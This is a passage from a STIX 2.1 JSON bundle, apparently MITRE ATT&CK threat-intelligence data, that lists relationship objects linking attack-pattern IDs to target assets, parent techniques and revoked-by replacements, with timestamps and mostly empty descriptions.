[]}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--66d041e2-d9e8-46cc-88ee-8e5c1cec8702", "created": "2023-09-29T17:43:31.956Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:43:31.956Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--66d8f3d7-68e0-48a0-a563-4746922080fc", "created": "2024-04-09T20:48:46.756Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T20:48:46.756Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--670f37e1-8de3-441e-bc09-ff95c09ee14d", "created": "2020-03-16T14:12:48.061Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6754195a-99cd-4b45-bafd-4a374ae79bbd", "created": "2023-09-29T18:02:52.119Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:02:52.119Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--675797fa-5593-48b4-9365-8f30510b2a32", "created": "2024-05-22T15:30:02.107Z", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-22T15:30:02.107Z", "description": "Asset Mapping Rationale: Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials.", "relationship_type": "targets", "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--676011dc-7c68-40ac-aec5-cb8d71e66a27", "created": "2020-03-09T14:09:09.014Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--5ad95aaa-49c1-4784-821d-2e83f47b079b", "target_ref": "attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6795c92f-848f-488e-9c25-d240f99c9b34", "created": "2023-09-28T21:23:39.333Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:23:39.333Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--67ae8423-c401-4c11-93d3-0454c288d934", "created": "2023-09-29T16:31:57.421Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:31:57.421Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--67dae594-4239-4756-a0bc-dee75de19e4c", "created": "2023-09-29T17:07:14.259Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:07:14.259Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--682eac15-9d0a-4dc6-8a0a-29f4e15e0696", "created": "2020-01-30T17:37:22.821Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51", "target_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--685249f9-e51a-4914-8b7f-09679e04198b", "created": "2023-09-28T19:49:11.359Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:49:11.359Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--688d2041-5c8b-47e0-86e1-a8d16134bdb1", "created": "2023-09-28T19:39:25.832Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:39:25.832Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--68a528b5-ddc5-431a-9d63-eb2a6ce03559", "created": "2020-03-10T18:31:00.596Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--53bfc8bf-8f76-4cd7-8958-49a884ddb3ee", "target_ref": "attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--68e0f80d-86e4-47c4-9498-49fa72221ca2", "created": "2020-03-27T21:04:50.409Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--68eb092e-fa23-4d6d-8a71-8653e962e7ed", "created": "2020-02-25T18:35:42.851Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--e0033c16-a07e-48aa-8204-7c3ca669998c", "target_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6905186c-0c88-472e-a3a3-2dca4cf1c874", "created": "2020-03-27T21:16:58.932Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab", "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--692ff921-c74d-40a4-ab31-879aba5f247a", "created": "2023-09-29T16:42:01.287Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:42:01.287Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--696fe03b-95f6-400e-8bea-d9b16a2fd1b2", "created": "2020-01-31T19:00:31.070Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--215190a9-9f02-4e83-bb5f-e0589965a302", "target_ref": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--69cf4015-fae1-47f6-9253-1f99209288a5", "created": "2023-09-29T16:27:34.964Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:27:34.964Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--69f4ed24-c2f7-49e1-99a2-350cc2795820", "created": "2023-09-29T17:44:19.135Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:44:19.135Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6a1d7178-8bad-42cc-81dd-cd74d949cede", "created": "2020-02-20T21:01:25.557Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6a2d3362-53f6-455b-bc1f-be9b85706a47", "created": "2024-03-29T18:07:05.497Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-29T18:07:05.497Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--3a32740a-11b0-4bcf-b0a9-3abd0f6d3cd5", "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6a387a6a-2359-4ea6-ab73-9428e188d408", "created": "2020-01-30T17:03:43.478Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926", "target_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6a476f56-2c07-43be-8054-d978ee8eb924", "created": "2023-09-29T16:42:12.160Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:42:12.160Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6ac1f40a-5fae-4d51-b357-0f57eec77a96", "created": "2020-02-05T20:13:52.283Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--101c3a64-9ba5-46c9-b573-5c501053cbca", "target_ref": "attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6ad3b5cc-7ba1-4287-8c05-d02385f84f72", "created": "2023-09-29T16:31:22.789Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:31:22.789Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6b46c35d-aa25-430c-89a2-d8f512478122", "created": "2020-03-12T19:29:21.104Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", "target_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6b50cc7f-4284-4b29-bb70-e4184dd52691", "created": "2020-03-27T21:12:27.996Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6b54f354-9059-4366-8077-87360c4db2ab", "created": "2023-10-02T20:18:20.019Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:18:20.019Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6b7cd974-07dd-41b2-a40a-5410918a6e17", "created": "2020-02-21T21:08:36.670Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe", "target_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6b9361fc-6a9e-4fc3-bc53-72a3f616869a", "created": "2020-03-15T15:34:30.943Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", "target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6bae365a-4424-4365-a441-dff2b7993250", "created": "2020-02-18T18:22:41.699Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6c31c795-935a-41ad-8db1-d74430f4a553", "created": "2023-09-29T18:56:59.151Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-05-28T02:21:01.295Z", "description": "Asset Mapping Rationale: ", "relationship_type": "targets", "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6c470aa0-b119-4078-80fc-2b66a4d6eac4", "created": "2023-09-28T20:09:36.756Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:09:36.756Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6c917468-e8f1-48d1-b7e5-aab34c5ff497", "created": "2020-10-05T13:24:49.882Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6c99a74d-8a17-453b-9100-ebb3cca33faa", "created": "2020-03-13T14:10:43.600Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6c9c1c11-c996-4d2b-bbed-d73ae30efd2e", "created": "2023-09-28T20:08:52.975Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:08:52.975Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6cd07a3b-18d3-40ec-ab3d-cd4ae952609c", "created": "2020-01-24T18:26:19.234Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--6a3be63a-64c5-4678-a036-03ff8fc35300", "target_ref": "attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6d137f11-8f05-45e8-960c-d64bc14167be", "created": "2020-03-10T18:33:36.474Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", "target_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", 